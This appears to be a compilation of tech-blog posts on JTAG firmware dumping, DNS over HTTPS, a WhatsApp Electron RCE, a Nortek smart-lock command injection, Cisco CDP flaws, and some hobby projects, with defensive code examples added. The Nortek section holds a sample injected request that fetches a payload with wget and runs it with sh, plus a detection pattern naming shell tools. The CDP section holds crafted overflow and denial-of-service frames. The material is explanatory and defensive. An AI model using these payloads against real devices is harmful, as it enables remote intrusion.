If not, it might be because you haven’t mastered the basics of JTAG and learned how to dump, or snarf, the firmware of an embedded device. This JTAG primer will get you up to snuff on snarfing, and help you build your reverse engineering skills.
Whatever your motivation for diving into reverse engineering devices with microcontrollers, JTAG skills are a must, and [Sergio Prado]’s guide will get you going. He starts with a description and brief history of the Joint Test Action Group interface, from its humble beginnings as a PCB testing standard to the de facto standard for testing, debugging, and flashing firmware onto devices. He covers how to locate the JTAG pads – even when they’ve been purposely obfuscated – including the use of brute-force tools like the JTAGulator. Once you’ve got a connection, his tutorial helps you find the firmware in flash memory and snarf it up to a file for inspection, modification, or whatever else you have planned.
We always appreciate guides like these that cover the basics, since not everyone is in the same place in their hardware hacking journey. This puts us in the mood to crack something open and start looking for pins, if for no other reason than to get some practice.
Since our work on DoH began, many browsers have announced plans to support DoH, and we’ve even seen major websites like Facebook move to support a more secure DNS. If you’re interested in exactly how DoH protects your browsing history, here’s an in-depth explainer by Lin Clark. We’re enabling DoH by default only in the US. If you’re outside the US and would like to enable DoH, you can do so by going to Settings, then General, then scrolling down to Networking Settings and clicking the Settings button on the right. Tick the Enable DNS over HTTPS checkbox that appears. By default, this sends your encrypted DNS requests to Cloudflare.
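To make "encrypted DNS requests" concrete, here is an added example that is not part of Mozilla’s post: what a DoH client puts on the wire. RFC 8484 carries an ordinary DNS message (RFC 1035 wire format) inside HTTPS, either base64url-encoded in a GET query string or as a POST body with Content-Type application/dns-message. Everything runs offline: the resolver URL is a placeholder, and the "response" is a hand-built packet rather than anything a real resolver returned.

```javascript
// Added example: RFC 8484 DoH request encoding and response parsing, offline.
const RESOLVER = 'https://resolver.example/dns-query';  // placeholder endpoint, not a real resolver

// "www.example.com" -> 03 'www' 07 'example' 03 'com' 00
function encodeName(name) {
  const out = [];
  for (const label of name.replace(/\.$/, '').split('.')) {
    const bytes = Buffer.from(label, 'ascii');
    if (bytes.length === 0 || bytes.length > 63) throw new Error(`bad label "${label}"`);
    out.push(Buffer.from([bytes.length]), bytes);
  }
  out.push(Buffer.from([0]));
  return Buffer.concat(out);
}

// Query with ID 0, as RFC 8484 recommends: identical questions then produce
// identical URLs, which HTTP caches can serve.
function buildQuery(name, qtype = 1) {
  const header = Buffer.alloc(12);
  header.writeUInt16BE(0x0100, 2);   // ID stays 0; flags = RD (recursion desired)
  header.writeUInt16BE(1, 4);        // QDCOUNT = 1
  const tail = Buffer.alloc(4);
  tail.writeUInt16BE(qtype, 0);      // QTYPE (1 = A)
  tail.writeUInt16BE(1, 2);          // QCLASS = IN
  return Buffer.concat([header, encodeName(name), tail]);
}

// The dns= parameter is base64url with the padding stripped.
function toDnsParam(msg) {
  return msg.toString('base64').replace(/\+/g, '-').replace(/\//g, '_').replace(/=+$/, '');
}
function dohGetUrl(name, qtype = 1) {
  return `${RESOLVER}?dns=${toDnsParam(buildQuery(name, qtype))}`;
}

// Read a name at `pos`, following RFC 1035 compression pointers (0xC0xx) with a
// hop limit so a malicious response cannot send the parser round in circles.
function readName(buf, pos) {
  const labels = [];
  let end = -1, hops = 0;
  for (;;) {
    const len = buf[pos];
    if (len === undefined) throw new Error('truncated name');
    if ((len & 0xC0) === 0xC0) {
      if (pos + 1 >= buf.length) throw new Error('truncated pointer');
      if (end < 0) end = pos + 2;                      // in the record, the name ends after the pointer
      if (++hops > 16) throw new Error('compression pointer loop');
      pos = ((len & 0x3F) << 8) | buf[pos + 1];
      continue;
    }
    if (len === 0) { if (end < 0) end = pos + 1; break; }
    labels.push(buf.subarray(pos + 1, pos + 1 + len).toString('ascii'));
    pos += 1 + len;
  }
  return { name: labels.join('.'), next: end };
}

// Parse a response and return its A records.
function parseAnswers(buf) {
  if (buf.length < 12) throw new Error('short header');
  const flags = buf.readUInt16BE(2);
  if (!(flags & 0x8000)) throw new Error('QR bit clear: not a response');
  const qd = buf.readUInt16BE(4), an = buf.readUInt16BE(6);
  let pos = 12;
  for (let i = 0; i < qd; i++) pos = readName(buf, pos).next + 4;   // skip QTYPE/QCLASS
  const answers = [];
  for (let i = 0; i < an; i++) {
    const { name, next } = readName(buf, pos);
    if (next + 10 > buf.length) throw new Error('truncated resource record');
    const type = buf.readUInt16BE(next), ttl = buf.readUInt32BE(next + 4), rdlen = buf.readUInt16BE(next + 8);
    const rdata = buf.subarray(next + 10, next + 10 + rdlen);
    if (rdata.length !== rdlen) throw new Error('truncated RDATA');
    if (type === 1 && rdlen === 4) answers.push({ name, ttl, address: Array.from(rdata).join('.') });
    pos = next + 10 + rdlen;
  }
  return { rcode: flags & 0x0F, answers };
}

// Constructed response to the query above: ID 0, flags QR|RD|RA, one question,
// one A record with TTL 3600 and 93.184.216.34 as an illustrative address.
const SAMPLE_RESPONSE = Buffer.concat([
  Buffer.from('000081800001000100000000', 'hex'),
  encodeName('www.example.com'), Buffer.from([0, 1, 0, 1]),
  Buffer.from([0xC0, 0x0C, 0, 1, 0, 1]),                    // NAME = pointer to offset 12, TYPE A, CLASS IN
  Buffer.from([0, 0, 0x0E, 0x10, 0, 4, 93, 184, 216, 34]),  // TTL 3600, RDLENGTH 4, RDATA
]);
```

Over the wire, an observer sees only a TLS connection to the resolver (whose hostname is visible in the TLS ClientHello); the query name is inside the ciphertext. DoH therefore changes who can see your queries rather than whether anyone can: the resolver you choose, Cloudflare by default in Firefox, still sees every one of them.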
Google Photos is handy. You take pictures and videos on your cell phone, and they automatically upload to the cloud. If you’re anything like me, however, every snap comes with a self-reminder that “the cloud” is a fancy name for someone else’s server. What could possibly go wrong? How about some of your videos randomly included in another user’s downloads?
Confirmed by Google, this bug hit users of Google Takeout, the service that lets you download all your data from a Google application as a single archive. According to a notice sent to those who downloaded them, Google Photos archives downloaded between November 21 and November 25 may contain videos belonging to other users. Notably, those notices have not been sent to the users whose videos were exposed.
Whatsapp has been in the news for a couple reasons in the last few days. I’ll leave it to you to decide if the stories are related. First, Jeff Bezos seems to have had some of his accounts or devices compromised by Saudi agents. The popular theory is that a video sent over Whatsapp contained an exploit, which when downloaded on Bezos’ iPhone, resulted in a persistent compromise. This theory seems to be supported by an analysis by FTI.
Reading through the report is… underwhelming. The video they suspect to have been the compromise vector wasn’t ever successfully decrypted. No actual Indicators of Compromise were found, and no maliciously changed systems files were identified. The closest thing to a smoking gun found in the report is the vast amounts of outgoing data observed after the potential compromise. There are questions about the usefulness of that metric, and Robert Graham does a good job debunking the report.
Whatsapp *has* had several high-profile vulnerabilities that could have been used to pull off an attack like this, which brings us to the topic of vulnerabilities in Whatsapp. Here’s one in the desktop app.
[Gal Weizman] discovered a weird Whatsapp problem in 2017. When using the web interface and sending a message that quoted a previous message, it was possible to manipulate the quoted message, putting words in someone’s mouth. He found it amusing, but eventually came back to take a more serious look at what he’d found. He discovered that he could also hijack the link preview banner, giving him a cross-site scripting (XSS) attack. That would be a serious enough vulnerability in itself, but not content with XSS, [Gal] took things one step further.
Whatsapp offers a native desktop app built on the Electron framework. Electron essentially lets you package a web app in native form: under the hood, it’s a Chromium browser bundled with the web-based code, and depending on how the app is configured, the bundled pages can reach Node.js APIs that a normal web page never sees. A consequence is that an XSS vulnerability in the web app will likely work in the Electron app as well. This was no exception, and since Whatsapp was shipping its app with an ancient version of Electron, an old Chromium vulnerability was still present, turning the XSS into a viable RCE that escapes the Electron app.
Whatsapp has released updates that address these issues, so if you have desktop Whatsapp installed, go make sure it’s up to date!
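The configuration side of that story is worth seeing in code. The following is an added example; it is not WhatsApp’s code (which is not public) and not Electron’s documentation. It shows the Electron settings that decide whether an XSS in the bundled web app stays a web bug or reaches the host, plus the navigation guards that stop injected markup (a hijacked link preview, say) from steering the window. The Electron objects are passed in as parameters so the logic can be exercised without Electron installed; ALLOWED_ORIGIN and the fake webContents are assumptions made for the demonstration.

```javascript
// Added example: Electron renderer hardening and navigation guards.
const ALLOWED_ORIGIN = 'https://app.example';  // assumed origin of the packaged web app

// Weak: page script gets Node's require(), so an XSS payload can
// require('child_process') and spawn whatever it likes.
const WEAK_PREFS = { nodeIntegration: true, contextIsolation: false };

// Hardened: no Node in the renderer; preload-script objects live in a separate
// JS world the page cannot touch; the renderer process sits in Chromium's OS
// sandbox so a Chromium bug still needs a sandbox escape to reach the host.
const HARDENED_PREFS = {
  nodeIntegration: false,
  contextIsolation: true,
  sandbox: true,
  webSecurity: true,
  allowRunningInsecureContent: false,
};

function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return null; }
}

// Only plain web URLs may be handed to the OS browser; javascript:, file: and
// custom schemes are refused.
function isSafeExternalUrl(url) {
  let parsed;
  try { parsed = new URL(url); } catch (e) { return false; }
  return parsed.protocol === 'https:' || parsed.protocol === 'http:';
}

// Keep in-window navigation on the app's own origin and send everything else
// to the system browser or nowhere. Returns the decision log for inspection.
function installNavigationGuards(webContents, shell) {
  const decisions = [];
  webContents.on('will-navigate', (event, url) => {
    if (originOf(url) === ALLOWED_ORIGIN) { decisions.push({ url, action: 'allowed' }); return; }
    event.preventDefault();
    decisions.push({ url, action: 'blocked' });
  });
  webContents.setWindowOpenHandler(({ url }) => {
    if (isSafeExternalUrl(url)) { shell.openExternal(url); decisions.push({ url, action: 'external' }); }
    else decisions.push({ url, action: 'blocked' });
    return { action: 'deny' };                  // the page never gets a new Electron window
  });
  return decisions;
}

// Under Electron this is the main-process entry point: pass in the real
// require('electron') object.
function createWindow({ BrowserWindow, shell }) {
  const win = new BrowserWindow({ webPreferences: HARDENED_PREFS });
  installNavigationGuards(win.webContents, shell);
  win.loadURL(ALLOWED_ORIGIN);
  return win;
}

// Stand-in for webContents so the guards can be driven from plain Node.
function fakeWebContents() {
  const handlers = {};
  return {
    on: (evt, fn) => { handlers[evt] = fn; },
    setWindowOpenHandler: (fn) => { handlers.open = fn; },
    // Simulate the page navigating; returns true if the guard cancelled it.
    navigate(url) {
      let prevented = false;
      handlers['will-navigate']({ preventDefault: () => { prevented = true; } }, url);
      return prevented;
    },
    // Simulate window.open / target=_blank from the page.
    open(url) { return handlers.open({ url }); },
  };
}
```

None of this substitutes for shipping a current Electron: contextIsolation and the sandbox limit what an XSS can reach, but the old Chromium bug described above is fixed only by upgrading the framework, which is why the update notice matters.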
I got Phished
You’re familiar with haveibeenpwned.com. Have you ever thought to yourself, if only there was a service that alerted me when one of my domains showed up in a phishing attack? I Got Phished is the service for you. It’s intended for a company’s security team to sign up with the company’s domains. When an email address from one of those domains shows up in a phishing database, the team gets an email alerting them.
All it takes to sign up is the abuse@, postmaster@, noc@, or security@ email address for the domain you want to monitor. So gmail users, you’re out of luck. If you run your own domain, then maybe it’s worth signing up for the service.
A series of smart locks made by Nortek Security & Control has a vulnerability that is now being actively exploited. A PHP endpoint on those devices fails to sanitize its input, runs as root, and can be used to run arbitrary commands. card_scan_decoder.php is reachable over HTTP, and anything passed in its door parameter is executed as root. The active attack uses wget to fetch a file from a remote server and then runs it.
To exploit this flaw remotely, the endpoint has to be reachable, which means that so far only devices with a public IP address are exposed. The limited IPv4 address space and widespread use of NAT have once again blunted the impact of a really serious vulnerability. It will be interesting to watch what happens as IPv6 spreads and more devices, many of them poorly secured, get their own globally routable addresses.
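Here is the shape of that bug next to its fix, as an added example; it is not Nortek’s PHP, which is not reproduced here. The handlers return what they would run instead of running anything, so the payload can be inspected safely, and a small log check flags the wget pattern the article describes. The endpoint name and the door parameter come from the article; the decoder binary path, the permitted door-id format and the log lines are assumptions constructed for the example.

```javascript
// Added example: command injection via a request parameter, hardened form,
// and a log check for the in-the-wild payload pattern.
const DECODER = '/usr/local/bin/card_decoder';  // assumed path of the helper the PHP page invokes

// Vulnerable: the value goes into a string that a shell will interpret, so
// ';', '|', '`', '$(...)' or a newline ends the intended command and starts another.
function vulnerableCommand(params) {
  return `${DECODER} --door ${params.door}`;     // what a shell_exec()/system() call would receive
}

// Hardened: validate against a strict allowlist, then hand an argv array to an
// execFile/proc_open-style API so no shell ever parses the value. The handler
// should also run as an unprivileged user rather than root, so that a bug that
// slips through yields that user's rights, not the whole device.
function hardenedCommand(params) {
  const door = String(params.door ?? '');
  if (!/^[1-9][0-9]{0,2}$/.test(door)) return { error: `rejected door id ${JSON.stringify(door)}` };  // door ids assumed to be 1..999
  return { file: DECODER, args: ['--door', door] };   // child_process.execFile(file, args, cb)
}

// Detection: the observed attack abused the door parameter to wget a payload
// and run it. Flag any request whose door value is not a plain number or that
// carries shell metacharacters or download/execution tokens.
const SUSPICIOUS = /[;&|`$(){}\n<>]|\b(wget|curl|sh|bash|chmod)\b/;
function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = line.match(/"(?:GET|POST) ([^ ]*card_scan_decoder\.php)\?([^ "]*)/);
    if (!m) continue;
    const door = new URLSearchParams(m[2]).get('door') ?? '';
    if (SUSPICIOUS.test(door) || !/^[1-9][0-9]{0,2}$/.test(door)) hits.push({ line, door });
  }
  return hits;
}

// Constructed access-log lines in Apache combined format (not from a real device).
const SAMPLE_LOG = [
  '203.0.113.7 - - [05/Feb/2020:10:01:02 +0000] "GET /card_scan_decoder.php?door=1 HTTP/1.1" 200 17 "-" "Mozilla/5.0"',
  '198.51.100.23 - - [05/Feb/2020:10:03:44 +0000] "GET /card_scan_decoder.php?door=1;wget%20http://198.51.100.9/x%20-O%20/tmp/x;sh%20/tmp/x HTTP/1.1" 200 17 "-" "python-requests/2.22"',
  '203.0.113.7 - - [05/Feb/2020:10:05:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
];
```

The allowlist is the important half: escaping individual metacharacters is fragile, whereas refusing anything that is not a short integer and never invoking a shell removes the whole class of bug at once.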
Doom on a Desk Phone
Researchers at Armis have published their research into Cisco hardware under the name CDPwn, inspired by Cisco’s CDP (Cisco Discovery Protocol). The interesting details are available in their whitepaper, but before we get to that, take a moment to watch the video embedded below, as it combines a couple of our favorite things here at Hackaday: security vulnerabilities, and running Doom on unexpected hardware.
Cisco manufactures hundreds of different devices, and one of their selling points is interoperability. You plug a Cisco phone into a Cisco switch, and they do some autoconfiguration magic, setting up proper VLANs, etc. Many of these features depend on proprietary Cisco protocols, and one of the most important is CDP. This layer-2 protocol lets directly connected devices describe themselves to each other, regardless of what VLAN they’re set to. After looking at previously discovered CDP flaws, the guys at Armis got to work. Their first discovery was a Denial of Service attack. The packet that informs a neighboring device about addresses lacked a reasonable upper bound on the number of addresses described. An incoming packet could claim to describe three billion addresses, and the target device would simply crash trying to allocate enough memory to handle it.
One surprising discovery is that the CDP implementation seems to have been built from scratch for each Cisco product line. While this means a single vulnerability can’t be leveraged across every device, it does suggest that more vulnerabilities exist overall and will take longer to fix. In VoIP phones, for example, the PortID TLV (Type-Length-Value) is copied into a static buffer without proper length checks. It’s a trivial buffer overflow, easily leading to exploitation.
Cisco has firmware updates available for the affected devices. These aren’t particularly sophisticated attacks. It appears once again that a reputable brand name doesn’t guarantee quality code running under the hood.
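Both bugs are failures of the same discipline, so here is what a TLV walker with the missing checks looks like. This is an added example, not Armis’s proof of concept and not Cisco’s parser. CDP frames are a 4-byte header (version, TTL, 16-bit checksum) followed by TLVs whose 16-bit length includes the 4-byte TLV header itself; the Address TLV carries a 32-bit count followed by per-address entries. The frames are built by hand, the Port ID buffer size and the address cap are assumptions, and the checksum is ignored.

```javascript
// Added example: bounds-checked CDP TLV parsing with the two checks the
// article's bugs lacked (Port ID length, Address TLV count).
const TLV_DEVICE_ID = 0x0001, TLV_ADDRESS = 0x0002, TLV_PORT_ID = 0x0003;
const MAX_PORT_ID = 64;     // size of the fixed buffer a Port ID is copied into (assumed)
const MAX_ADDRESSES = 16;   // policy cap; a neighbour advertising more than this is not credible

function parseCdp(frame) {
  if (frame.length < 4) throw new Error('short CDP header');
  const out = { version: frame[0], ttl: frame[1], tlvs: [] };
  let pos = 4;
  while (pos < frame.length) {
    if (pos + 4 > frame.length) throw new Error(`truncated TLV header at offset ${pos}`);
    const type = frame.readUInt16BE(pos), len = frame.readUInt16BE(pos + 2);
    if (len < 4) throw new Error(`TLV length ${len} is smaller than its own header`);  // would underflow or never advance
    if (pos + len > frame.length) throw new Error(`TLV length ${len} runs past end of frame`);
    out.tlvs.push(decodeTlv(type, frame.subarray(pos + 4, pos + len)));
    pos += len;
  }
  return out;
}

function decodeTlv(type, value) {
  switch (type) {
    case TLV_DEVICE_ID:
      return { type: 'DeviceID', value: value.toString('ascii') };
    case TLV_PORT_ID:
      // The phone bug: copy first, never check the size. Check, then copy.
      if (value.length > MAX_PORT_ID) throw new Error(`Port ID of ${value.length} bytes exceeds ${MAX_PORT_ID}-byte buffer`);
      return { type: 'PortID', value: value.toString('ascii') };
    case TLV_ADDRESS:
      return { type: 'Address', addresses: decodeAddresses(value) };
    default:
      return { type: `0x${type.toString(16).padStart(4, '0')}`, length: value.length };
  }
}

// Address TLV: 32-bit count, then per entry: protocol type (1), protocol
// length (1), protocol bytes, address length (2), address bytes. IPv4 is
// protocol type 1 (NLPID) with the single protocol byte 0xCC.
function decodeAddresses(value) {
  if (value.length < 4) throw new Error('address TLV shorter than its count field');
  const count = value.readUInt32BE(0);
  // The DoS bug: the count drove an allocation directly. Bound it by policy and
  // by the bytes actually present before allocating anything.
  if (count > MAX_ADDRESSES) throw new Error(`address count ${count} exceeds cap of ${MAX_ADDRESSES}`);
  if (count * 4 > value.length - 4) throw new Error(`address count ${count} not backed by payload`);  // 4 = smallest possible entry
  const addrs = [];
  let p = 4;
  for (let i = 0; i < count; i++) {
    if (p + 2 > value.length) throw new Error('truncated address entry');
    const ptype = value[p], plen = value[p + 1];
    if (p + 2 + plen + 2 > value.length) throw new Error('truncated protocol field');
    const proto = value.subarray(p + 2, p + 2 + plen);
    const alen = value.readUInt16BE(p + 2 + plen);
    const start = p + 2 + plen + 2;
    if (start + alen > value.length) throw new Error('truncated address field');
    const addr = value.subarray(start, start + alen);
    const isIpv4 = ptype === 1 && plen === 1 && proto[0] === 0xCC && alen === 4;
    addrs.push(isIpv4 ? Array.from(addr).join('.') : addr.toString('hex'));
    p = start + alen;
  }
  return addrs;
}

// Frame builder and constructed frames: one benign, one per bug, one malformed.
function tlv(type, value) {
  const hdr = Buffer.alloc(4);
  hdr.writeUInt16BE(type, 0);
  hdr.writeUInt16BE(4 + value.length, 2);
  return Buffer.concat([hdr, value]);
}
const CDP_HEADER = Buffer.from([0x02, 0xB4, 0x00, 0x00]);                  // version 2, TTL 180 s, checksum ignored
const IPV4_ENTRY = Buffer.from([0x01, 0x01, 0xCC, 0x00, 0x04, 192, 168, 1, 10]);
const BENIGN_FRAME = Buffer.concat([
  CDP_HEADER,
  tlv(TLV_DEVICE_ID, Buffer.from('phone-1')),
  tlv(TLV_PORT_ID, Buffer.from('Port 1')),
  tlv(TLV_ADDRESS, Buffer.concat([Buffer.from([0, 0, 0, 1]), IPV4_ENTRY])),
]);
const DOS_FRAME = Buffer.concat([CDP_HEADER, tlv(TLV_ADDRESS, Buffer.from([0xB2, 0xD0, 0x5E, 0x00]))]);  // claims 3,000,000,000 addresses
const OVERFLOW_FRAME = Buffer.concat([CDP_HEADER, tlv(TLV_PORT_ID, Buffer.alloc(200, 0x41))]);              // 200-byte Port ID
const BAD_LENGTH_FRAME = Buffer.concat([CDP_HEADER, Buffer.from([0x00, 0x03, 0x00, 0x02])]);               // TLV length 2 < header
```

In C, where the real parsers live, the same three comparisons sit in front of the memcpy and the malloc; the point is that every length a neighbour sends is attacker-controlled, and nothing is allocated or copied until the number has been checked against both the frame and a sane ceiling.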
Ask anyone who’s ever tuned into Fireplace TV on a cold winter’s night — even though you can’t feel the heat or roast a marshmallow with it, fake fire is almost as soothing as the real thing. And if you have kids or pets, it’s a whole lot safer. But why go to the expense of buying a lighted insert when you could just make your own?
You don’t even need to get fancy with a microcontroller and RGB LEDs, either — just do what [Ham-made] did and dismantle some LED flame bulbs. They already have everything you need, and the flex PCB makes them easy to work with.
[Ham-made] adhered three bulbs’ worth to a piece of foam board with double-stick tape, soldered all the leads together, and wired in a toggle switch and a 2xAA battery pack. The bulbs each had a tilt switch so that the “flames” flow upward regardless of orientation, but [Ham-made] removed those to avoid flickering connectivity and fights with the toggle switch.
Once it was all wired up, [Ham-made] hot-glued some magnets to the foam board and attached it to the underside of the grate to keep it safe from the logs and the ash pit, while still allowing the glow to emanate from the right spot for realism. The only things missing are the crackles and pops, and [Ham-made] is burning to hear your implementation ideas.
[Ham-made] wasn’t using his fireplace in the traditional way because the house is smallish and centrally heated. But if you rely on yours to keep you warm and cozy, why not make it voice-activated?
Doing necessary maintenance on time is key to enjoying your project car. Too many gearheads know the pain of a neglected beast that spends more time up on jackstands than out on the road. Buying the right car, and keeping a close eye on what needs to be done, will go a long way to improving your experience and relationship with your ride.
If you’ve just bought a car, no matter how good things look, it’s a good idea to go through things with a fine-tooth comb to make sure everything’s up to scratch. This can avoid expensive damage down the line, and is a great way to get your feet wet if you’re new to working on cars. Here’s a bunch of easy jobs you can tackle as a novice that will keep your ride in tip-top condition.
Your car relies on a variety of highly-engineered fluids in order to run smoothly and reliably. Using the right fluids and changing them at regular intervals is important to ensure your car performs well. While the seller may have assured you that everything’s been changed on schedule, the first thing you should be doing when you get your project home is to change the fluids.
Engine oil is perhaps the most important. Over time, contaminants build up in the oil and it begins to lose its effectiveness as a lubricant. Left too long, your oil pump can clog and you’ll lose oil pressure, destroying your engine in mere seconds. Metallic particles can also build up as the engine wears, and your oil filter can only do so much. You want to keep your oil fresh and of the appropriate grade; most manufacturers recommend a set time period or mileage for changing it. This is an easy job on the vast majority of cars, though you might find some difficulty in reaching your oil filter (looking at you, Miata). It’s a great way to get comfortable working on your car – just make sure you put the new oil in before you start the engine, or you’ve almost certainly ruined your ride. You can even send samples of your oil away for analysis that can help diagnose long-term issues. Oh, and be sure to use a new filter every time – and keep an eye out for leaks!
Coolant is also an important fluid to check and change regularly. If it looks rusty and brown, your engine components are corroding, and that’s no good for the long-term health of your ride. Thankfully, it’s easy to change: most cars have a tap to help dump the coolant before you top it up. If things are particularly dirty, you might want to run a coolant flush solution through the system before you replace the fluid. Just make sure you burp the air out of the system properly before heading back out on the road, lest you overheat your engine.
Other fluids in your car generally have quite long intervals before service is required. Automatic transmissions often call for oil changes only rarely; more than 100,000 km is common. Similar intervals are typical for manual transmissions and differential oil. If you’ve just got the car and it’s shifting and driving well, you’re likely safe to leave these alone. They’re usually a little more difficult to tackle, so consider approaching these once you’ve gotten a little more comfortable with the wrenches.
Filters play an important role, ensuring your car doesn’t clog its fuel injectors every time you fill up at a dodgy gas station, or making sure sand doesn’t wreck the cylinder bores. However, they get clogged over time, leading to reduced performance and other niggling issues. Thankfully, they’re often cheap and easy to change, and are easily handled by the shadetree mechanic.
Air filters are the engine’s main protection from dust and particulates. Often made of paper or foam, they’re usually located in an accessible spot next to or on top of the engine, and a simple visual inspection is usually enough to tell if they need replacement. If the filter is dirty or falling apart, swap it out. If it’s covered in oil, you’ll also want a new one, though that’s a sign you have other problems. Generally, a high-quality OEM filter is the best replacement. There’s little to be gained by swapping to a pod filter or a cheap eBay intake, unless you really know what you’re doing and are sourcing high-quality parts.
Fuel filters are responsible for making sure the tiny passages of your carburetor or injectors don’t get blocked with detritus in fuel. If you’re having strange issues with stumbling or a lack of acceleration, you might find your fuel filter is nearing the end of its life. When they get clogged, fuel pressure drops and this can lead to performance issues. Carbureted cars often have one or more inline filters that can be swapped out with little more than a screwdriver. Fuel injected cars can be a little more complex and often have multiple filters, but they’re still fairly straightforward to change if you know where to look. Their in-tank pumps also have a special filter sock on them, but these usually last as long as the pump and you needn’t worry about them too much.
Wheels and Tires
Ask around the racetrack about how to start making your car faster, and the first thing you’ll get told is “tires, tires, tires”. Your tires are the interface between your car and the road, and no matter what you do to the rest of the car, if you’ve got bad tires, it’ll all be for naught. It’s not just about speed on the track, though – whether you’re driving on the street or off-road, a good set of tires is important to keep your car pointed the right way, and avoid ending upside down in a ditch.
Oftentimes, project cars can come with a mismatched set of wheels and tires, or completely bald rubber. Worst case, you’ve dragged something out of a barn or a field, and it’s sitting on rubber well over 10 years old. Just because they have tread and hold air, doesn’t mean they’re safe to drive on. Rubber doesn’t age well, and unless your new ride has a set of fresh meats with plenty of tread and a current date code, you’ll want to get them replaced.
It’s also important to pay attention to wheel and tire size. Putting huge rims on your car can look cool to some, but it’s often a great way to spoil your handling. There’s no need to stick rigidly to the manufacturer’s standard wheels, of course – these can be ugly and boring, after all. The best way to get the right wheels and tires is to talk to other enthusiasts that have builds similar to what you’re going for. They’ll be able to tell you what works for your car, with your suspension setup, and your intended goals.
For example, the original NA Miata came with 14″ x 5″ wheels. These are fine for getting about town, but for track use, they’re too skinny to generate much grip. It’s also difficult to find good rubber to suit 14″ wheels these days; there are options available, but they’re expensive and obscure. By asking around forums, and chatting to the old hands at the track, I was able to learn that a set of 15″ wheels between 7″-8″ wide would be a good bet, ideally with an offset between +20 and +35 to make sure they nicely filled the guards. Armed with this knowledge, I was able to purchase a set of wheels that looked great and fit properly without needing any wheel spacers or other ugly hacks. Wrapped in some sticky semi-slicks, my lap times dropped by 4 seconds overnight! By doing my research, I got a great result without wasting any time or money.
It’s likely that, as you’ve bought a project, your car has a few issues. Maybe it’s got a noisy exhaust, or it’s using more fuel than it should. While these may not get in the way of your car getting from A to B, they can dull your enjoyment significantly, and add to the financial burden of having a project car. However, fixing these issues is a great way to start learning about how your car works!
Diagnosis can be tough for the beginner, particularly when faced with a tricky problem, minimal tools, and limited experience. Many will guess at the cause of the problem and begin replacing parts, only to find the issue recurring time and again. Finding the root cause of an issue is far more productive. This is achieved by looking logically at the symptoms, and testing parts and subsystems to confirm that they are indeed operating properly. It involves learning how to use a multimeter, pressure gauges, and all manner of other equipment. This can be expensive, but can pay off down the road. Oftentimes, it’s important to weigh up buying more tools versus simply taking the car to a shop that already has the gear.
The one tool that any wrencher should have for working on OBD-II equipped cars is the scantool. This plugs into the diagnostic port in post-1996 vehicles, and allows the ECU to communicate fault codes to the driver. This is helpful in a wide variety of situations. For example, if your fuel economy is poor, and your scantool reports a bad oxygen sensor signal, it’s simple to replace the part and get things up and running again. Other problems, like misfires, can be more difficult to diagnose, but a scantool still helps point you in the right direction.
Thankfully, many parts of the car community are eager to share their knowledge and passion with those keen to learn. Facebook groups, forums, and similar gatherings are great places to look for help. Often, your problem will have been faced by many before, and simply putting the symptoms into Google will net the answers you need. Otherwise, reach out and start a conversation with those who may be able to help. Finding a good local mechanic can also be helpful. While many shops simply exist to get cars in and out the door, others specialize in certain makes and models and are willing to work with enthusiasts who need a little help on their journey toward working on their car. I’ve been lucky myself to know several great mechanics, who were able to step in and solve a couple of sticky issues that were just outside of my own abilities to solve. After picking up the car, I’ve learned a lot from a quick chat about what they had to do to fix the problem!
It’s a Marathon, Not A Sprint
For the newly initiated into the automotive hobby, it can sometimes feel like too much. If you’ve just started poking around under the hood of your new ride and found a mess of wires, bodged hoses and a forest of zipties, you might be a little overwhelmed. However, through regular maintenance, consultation with those in the know and a little perseverance, you can learn a lot and build yourself a sweet ride along the way. Happy hacking!
Most people associate the ESP family of microcontrollers with WiFi, which makes sense as they’ve become the solution of choice for getting your project online quickly and easily. But while the WiFi capability might be the star of the show, the ESP32 also comes equipped with Bluetooth; we just don’t see people using it nearly as often. If you’re looking to get started using Bluetooth on the ESP32, then this simple wireless macro keypad from [Brian Lough] would be a great way to get started.
From a hardware standpoint, this project is incredibly straightforward. All you need to do is connect a membrane keypad to the GPIO pins on the ESP32. Adding a battery is a nice touch, and you’d probably want to put it into an enclosure of some sort, but as a proof of concept it doesn’t get much easier than this. In this case [Brian] is using the TinyPICO board, but your personal ESP32 variant of choice will work just as well.
The rest of the project is all software, which [Brian] walks us through in the video after the break. There’s a preexisting library for Bluetooth Human Interface Device (HID) emulation on the ESP32, but it needs to be manually installed in the Arduino IDE. From there, he demonstrates how you can build up a functioning keyboard, including tricks such as sending multiple virtual keys at once.
In the past we’ve seen the ESP32 used to create a Bluetooth game controller, but the ability to emulate a keyboard obviously offers quite a bit more flexibility. With a practical demonstration of how easy it is to turn this low-cost microcontroller into a wireless input device, hopefully we’ll start seeing more projects that utilize the capability.